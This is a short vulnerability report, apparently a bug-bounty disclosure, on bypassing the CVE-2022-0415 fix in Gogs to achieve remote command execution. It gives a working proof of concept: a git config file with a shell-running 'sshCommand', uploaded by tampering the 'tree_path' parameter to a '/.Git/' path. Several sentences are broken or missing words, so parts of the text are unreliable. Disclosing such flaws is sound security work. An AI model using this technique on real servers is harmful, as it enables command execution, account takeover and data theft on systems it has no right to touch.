Bypass to Remote Command Execution in uploading repository file in gogs/gogs
Jun 6th 2022
I find a bypass for CVE-2022-0415 and previous fixs.
In the fix of CVE-2022-0415, gogs filter
/.Git/ can bypass this and upload successfully
Proof of Concept
Create a repository in Gogs, upload a file config to the repository on the web page:
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = echo pwnned > /tmp/poc [remote "origin"] url = email@example.com:torvalds/linux.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
Intercept the HTTP POST form submitting request, and set parameter to tree_path=
/.Git/ in request body.
Then a file with text pwnned is created in
host in a github repo
https://github.com/cokeBeer/test with name
This vulnerability is capable of executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.